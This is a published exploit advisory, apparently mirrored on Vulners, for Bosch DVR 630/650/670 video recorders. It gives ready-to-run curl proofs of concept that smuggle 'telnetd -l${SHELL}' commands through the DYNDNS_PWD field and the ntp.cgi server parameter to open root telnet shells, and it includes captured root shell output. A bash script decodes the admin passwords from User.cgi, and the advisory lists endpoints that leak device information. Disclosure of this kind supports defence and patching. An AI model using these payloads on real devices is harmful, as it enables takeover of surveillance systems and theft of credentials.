Vulners
Lucene search
Bosch Security Systems DVR 630/650/670 Root Shell / Password Disclosure
`:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2014-10-01 ]
###############################################################################
# [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities #
###############################################################################
#
# Device: "The Bosch Video Recorder 630/650 Series is an 8/16
# channel digital recorder that uses the latest H.264
# compression technology. With the supplied PC
# software and built-in web server, the 630/650 Series is
# a fully integrated, stand-alone video management
# solution that's ready to go, straight out of the box.
# Available with a variety of storage capacities, the
# 630/650 Series features a highly reliable embedded
# design that minimizes maintenance and reduces
# operational costs. The recorder is also available with a
# built-in DVD writer."
#
# Vendor: http://www.boschsecurity.com/
# Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf
# DVR 670 http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf
#
# Software Download:
# http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip
# http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip
#
# Timeline: 2014-10-01 Vulnerability discovered
# 2014-10-03 1 Contact with vendor - No response
# 2014-10-14 Published
#
#
###################################################################
# Gaining Root Shell Access [1]:
POST /Net_work.xml HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/network.html
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
Content-Length: 1274
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: MosaLanguage=0; session=
<NETWORK_SETTING>
<DHCP>0</DHCP>
<DHCPIP>10.11.219.2</DHCPIP>
<DHCPMASK>255.255.255.0</DHCPMASK>
<DHCPGW>10.11.219.1</DHCPGW>
<DHCPDNS1>0.0.0.0</DHCPDNS1>
<DHCPDNS2>0.0.0.0</DHCPDNS2>
<IP>10.11.219.2</IP>
<MASK>255.255.255.0</MASK>
<GW>10.11.219.1</GW>
<DNS1>0.0.0.0</DNS1>
<DNS2>0.0.0.0</DNS2>
<HTTP_PORT>80</HTTP_PORT>
<BANDWIDTH>0</BANDWIDTH>
<DDNS_SERVER>1</DDNS_SERVER>
<DYNDNS_HOST>wxss</DYNDNS_HOST>
<DYNDNS_USER>ffl</DYNDNS_USER>
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>
<TZO_HOST></TZO_HOST>
<TZO_MAIL></TZO_MAIL>
<TZO_KEY></TZO_KEY>
<SITE_HOST>sdads</SITE_HOST>
<SITE_PWD>dsadsd</SITE_PWD>
<SITE_RECORDID>sdasdas</SITE_RECORDID>
<SITE_FQDN>dasdas</SITE_FQDN>
<ALARM_ON>0</ALARM_ON>
<MOTION>0</MOTION>
<DISK_FAIL>0</DISK_FAIL>
<DISK_FULL>0</DISK_FULL>
<FAN_FAIL>0</FAN_FAIL>
<DISK_TEMP>0</DISK_TEMP>
<ADMIN_PW>0</ADMIN_PW>
<VIDEO_LOSS>0</VIDEO_LOSS>
<POWER>0</POWER>
<SENDER>0</SENDER>
<SMTP></SMTP>
<SMTP_PORT>25</SMTP_PORT>
<SSL>0</SSL>
<USERNAME></USERNAME>
<PWD></PWD>
<SENDER_MAIL></SENDER_MAIL>
<SUBJECT></SUBJECT>
<MAIL_1></MAIL_1>
<MAIL_2></MAIL_2>
<MAIL_3></MAIL_3>
<MAIL_TEST>0</MAIL_TEST>
</NETWORK_SETTING>
## PoC:
root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
-b 'MosaLanguage=0; session=' --data-binary $'<NETWORK_SETTING>\x0d\x0a <DHCP>0</DHCP>\x0d\x0a <DHCPIP>10.11.219.2</DHCPIP>\x0d\x0a \
<DHCPMASK>255.255.255.0</DHCPMASK>\x0d\x0a <DHCPGW>10.11.219.1</DHCPGW>\x0d\x0a <DHCPDNS1>0.0.0.0</DHCPDNS1>\x0d\x0a \
<DHCPDNS2>0.0.0.0</DHCPDNS2>\x0d\x0a <IP>10.11.219.2</IP>\x0d\x0a <MASK>255.255.255.0</MASK>\x0d\x0a <GW>10.11.219.1</GW>\x0d\x0a \
<DNS1>0.0.0.0</DNS1>\x0d\x0a <DNS2>0.0.0.0</DNS2>\x0d\x0a <HTTP_PORT>80</HTTP_PORT>\x0d\x0a <BANDWIDTH>0</BANDWIDTH>\x0d\x0a \
<DDNS_SERVER>1</DDNS_SERVER>\x0d\x0a <DYNDNS_HOST>wxss</DYNDNS_HOST>\x0d\x0a <DYNDNS_USER>ffl</DYNDNS_USER>\x0d\x0a \
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>\x0d\x0a <TZO_HOST></TZO_HOST>\x0d\x0a <TZO_MAIL></TZO_MAIL>\x0d\x0a \
<TZO_KEY></TZO_KEY>\x0d\x0a <SITE_HOST>sdads</SITE_HOST>\x0d\x0a <SITE_PWD>dsadsd</SITE_PWD>\x0d\x0a \
<SITE_RECORDID>sdasdas</SITE_RECORDID>\x0d\x0a <SITE_FQDN>dasdas</SITE_FQDN>\x0d\x0a <ALARM_ON>0</ALARM_ON>\x0d\x0a \
<MOTION>0</MOTION>\x0d\x0a <DISK_FAIL>0</DISK_FAIL>\x0d\x0a <DISK_FULL>0</DISK_FULL>\x0d\x0a <FAN_FAIL>0</FAN_FAIL>\x0d\x0a \
<DISK_TEMP>0</DISK_TEMP>\x0d\x0a <ADMIN_PW>0</ADMIN_PW>\x0d\x0a <VIDEO_LOSS>0</VIDEO_LOSS>\x0d\x0a <POWER>0</POWER>\x0d\x0a \
<SENDER>0</SENDER>\x0d\x0a <SMTP></SMTP>\x0d\x0a <SMTP_PORT>25</SMTP_PORT>\x0d\x0a <SSL>0</SSL>\x0d\x0a <USERNAME></USERNAME>\x0d\x0a \
<PWD></PWD>\x0d\x0a <SENDER_MAIL></SENDER_MAIL>\x0d\x0a <SUBJECT></SUBJECT>\x0d\x0a <MAIL_1></MAIL_1>\x0d\x0a <MAIL_2></MAIL_2>\x0d\x0a \
<MAIL_3></MAIL_3>\x0d\x0a <MAIL_TEST>0</MAIL_TEST>\x0d\x0a</NETWORK_SETTING>\x0d\x0a' 'http://10.11.219.2/Net_work.xml'
root@debian:~# telnet 10.11.219.2 30
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
2827 root 228 S telnetd -l/bin/sh -p30
/ # netstat -ltn | grep 30
tcp 0 0 0.0.0.0:30 0.0.0.0:* LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#
###################################################################
# Gaining Root Shell Access (authorization is needed) [2]:
GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/system.html
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: MosaLanguage=0; session=
## PoC:
root@debian:~# curl -i -s -k -X 'GET' \
-H 'Referer: http://10.11.219.2/system.html' \
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
-b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id'
root@debian:~# telnet 10.11.219.2 40
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
2827 root 228 S telnetd -l/bin/sh -p40
/ # netstat -ltn | grep 40
tcp 0 0 0.0.0.0:40 0.0.0.0:* LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#
###################################################################
# Admin Password Disclosure: http://10.11.219.2/User.cgi?cmd=get_user
## PoC Exploit:
#!/bin/bash
x=0;
for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g');
do base64 -d<<<$i; if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi; ((x++)); done
###################################################################
# Sensitive Information Disclosure:
http://10.11.219.2/Config.cgi?cmd=system_info
http://10.11.219.2/System.xml
http://10.11.219.2/Net_work.xml
http://10.11.219.2/webcmd.html
/ # cat /4mosa600/data/Webcmd_help.txt
cmd value (sample)
====================+==========================
blockid | 0 ~ block max // show block info and flag and gop status.
--------------------+-------------------------
disk | // show disk temp.
--------------------+-------------------------
reboot | // restart DVR.
--------------------+-------------------------
remote-info | // socket status.
--------------------+-------------------------
log | 1: System // show system log.
| 2: Record
| 4: Login
| 8: Configure
| 16: Operation
| 31: All
| 63: Service
--------------------+-------------------------
ionly | 1~12 how many frames in a GOP will send to internet
| 0: all I/P-frame (default)
| 1: I only
| 2: IP
| 3: IPP
| 4: IPPP
| ....
| 12: IPPPPPPPPPPP
| others: show current value on DVR.
--------------------+-------------------------
chlink | 0~MKF_CHANNEL // show channel link.
--------------------+-------------------------
bitrate | // show bitrate information.
--------------------+-------------------------
dls | // show about time and DLS message.
--------------------+-------------------------
bmp | // dump bmp file to http://x.x.x.x/vga0.bmp
--------------------+-------------------------
msg | This is bitmap
| bit 0 show encode FPS and Bitrate.
| bit 1 show encode resolution.(dependent bit 1)
| bit 2 show remote client mesage.
| bit 3 show ptz command.
| bit 4 cpu and memory usage..
--------------------+-------------------------
remote-cgi | 0 disable all cgi command.
| 1 show all cgi command to console.
| 2 show cig command if not "login_id"
--------------------+-------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Oct 2014 00:00Current
0.1Low risk
Vulners AI Score0.1